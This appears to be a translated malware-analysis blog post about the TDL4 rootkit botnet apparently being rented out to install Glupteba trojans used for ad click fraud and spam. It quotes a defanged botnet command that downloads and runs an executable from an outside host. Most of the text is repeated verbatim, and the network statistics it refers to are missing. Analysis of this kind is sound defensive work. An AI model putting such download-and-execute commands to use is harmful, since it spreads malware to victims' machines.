Is TDL4 botnet rented out?
Not long ago, we noticed an interesting feature in some new samples of the TDL4 rootkit (Win32 / Olmarik.AOV). If someone does not know, this rootkit has been able to retain the title of the most technologically advanced mass malware for several years now. This is the first full-fledged x64 rootkit that managed to bypass the digital signature verification and PatchGuard sneak into the kernel on 64-bit systems.
The fact is that after its successful installation, some copies of this rootkit are installed into the system of Trojans from the Win32 / Glupteba family. This suggests that the resources of this botnet began to be leased. It is also interesting that there is no further interaction between the Win32 / Glupteba and TDL4 bots.
So, immediately after successful installation and identification, the TDL4 bot receives the following command from C & C:
')
task_id = 2 | 10 || h ** p: //wheelcars.com/no.exe
Which can be interpreted as follows:
task_id = [command_id] [encryption_key] [URL]
In our case, the set of parameters coincides with the “DownloadAndExecute” command, because the encryption key is zero, and the command identifier is 2, and then the number of attempts to execute it is ten.
After installation in the Win32 / Glupteba system, it receives the task already from its C & C and starts its execution.
Most often, a bot receives two types of tasks: the first is the click-through of contextual advertising from the Begun advertising network, and the second is spamming. Let's take a closer look at what this bot does.
In the first case, there is a visit to a large number of specially formed web pages, the content of which provokes the appearance of a certain type of contextual ads. And all the web pages that are clicked from are located on the servers of the Masterhost provider.
If you look at the statistics of the network calls of the click bot, it looks like this:
The TDL4 botnet itself, like its predecessor, is also actively monetized through “black” methods of website promotion and the substitution of search results in popular search engines.
The fact is that after its successful installation, some copies of this rootkit are installed into the system of Trojans from the Win32 / Glupteba family. This suggests that the resources of this botnet began to be leased. It is also interesting that there is no further interaction between the Win32 / Glupteba and TDL4 bots.
So, immediately after successful installation and identification, the TDL4 bot receives the following command from C & C:
')
task_id = 2 | 10 || h ** p: //wheelcars.com/no.exe
Which can be interpreted as follows:
task_id = [command_id] [encryption_key] [URL]
In our case, the set of parameters coincides with the “DownloadAndExecute” command, because the encryption key is zero, and the command identifier is 2, and then the number of attempts to execute it is ten.
After installation in the Win32 / Glupteba system, it receives the task already from its C & C and starts its execution.
Most often, a bot receives two types of tasks: the first is the click-through of contextual advertising from the Begun advertising network, and the second is spamming. Let's take a closer look at what this bot does.
In the first case, there is a visit to a large number of specially formed web pages, the content of which provokes the appearance of a certain type of contextual ads. And all the web pages that are clicked from are located on the servers of the Masterhost provider.
If you look at the statistics of the network calls of the click bot, it looks like this:
The TDL4 botnet itself, like its predecessor, is also actively monetized through “black” methods of website promotion and the substitution of search results in popular search engines.
Source: https://habr.com/ru/post/115439/
All Articles